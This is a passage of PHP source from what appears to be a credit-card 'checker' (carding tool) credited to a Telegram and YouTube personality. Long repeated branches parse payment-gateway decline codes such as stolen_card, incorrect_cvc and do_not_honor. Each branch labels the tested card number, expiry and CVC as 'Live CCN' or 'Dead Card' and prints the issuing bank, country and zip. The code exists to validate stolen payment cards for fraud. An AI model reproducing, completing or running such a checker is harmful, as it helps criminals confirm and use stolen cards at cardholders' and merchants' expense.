</span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>
';
}
elseif (strpos($result, "stolen_card" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Stolen Card </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>
';
}
elseif (strpos($result, "Your card's security code is incorrect." )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your card security code is incorrect </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_cvc" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Incorrect CVC </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "pickup_card" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Pickup Card </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"fraudulent")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Fraudulent </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has expired.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card has expired </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'security code is invalid.' )) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Security Code is Invalid </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "expired_card" )) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Expired Card </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card number is incorrect.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card number is incorrect </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_number")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Incorrect Number </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "service_not_allowed")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Service Not Allowed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "do_not_honor")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Do Not Honor </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "generic_decline")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Generic Decline </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card was declined.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your Card was Declined </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unavailable"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Unavailable </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unchecked"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Unchecked </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "fail"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Check Failed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"parameter_invalid_empty")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Parameter Invalid Empty </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge 